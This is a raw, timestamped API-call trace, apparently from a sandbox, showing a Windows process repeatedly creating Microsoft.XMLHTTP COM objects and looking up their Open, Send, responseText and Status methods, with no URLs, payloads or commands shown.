	[0864.515] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0864.515] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0864.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0864.515] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0864.515] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0864.515] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0864.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0864.516] longjmp () 
	[0864.516] longjmp () 
	[0864.516] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0864.516] SysStringLen (param_1=0x0) returned 0x0
	[0864.516] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0864.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0864.516] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0864.516] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0864.516] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0864.517] ??2@YAPEAX_K@Z () returned 0x62f310
	[0864.517] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0864.517] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0864.517] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0864.518] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0864.520] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0864.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0864.520] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0864.520] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0864.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0864.521] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0864.521] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0865.170] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0865.170] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0865.170] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0865.170] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0865.170] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0865.171] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0873.962] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0873.962] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0873.963] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0873.964] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0873.964] SysStringLen (param_1=0x0) returned 0x0
	[0873.964] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0873.964] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0873.964] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0873.965] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0873.965] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0873.965] ??2@YAPEAX_K@Z () returned 0x62f310
	[0873.965] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0873.965] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0873.965] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0873.965] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0873.965] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0873.965] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0873.965] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0873.968] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0873.968] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0873.968] SysStringLen (param_1=0x0) returned 0x0
	[0873.968] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0873.968] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0873.968] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0873.968] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0873.968] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0873.969] ??2@YAPEAX_K@Z () returned 0x62f330
	[0873.969] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0873.969] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0873.969] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0873.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0873.969] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0873.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0873.969] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0873.969] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0873.969] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0873.969] SysStringLen (param_1=0x0) returned 0x0
	[0873.970] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0873.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0873.970] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0873.970] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0873.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0873.970] ??2@YAPEAX_K@Z () returned 0x62f310
	[0873.970] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0873.970] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0873.970] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0873.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0873.970] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0873.970] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0873.971] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0873.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0873.971] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0873.971] SysStringLen (param_1=0x0) returned 0x0
	[0873.971] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0873.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0873.971] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7490) returned 0x0
	[0873.971] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0873.971] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0873.971] ??2@YAPEAX_K@Z () returned 0x62f330
	[0873.971] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0873.971] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0873.971] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0873.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7490, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7490) returned 0x0
	[0873.972] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7490) returned 0x3
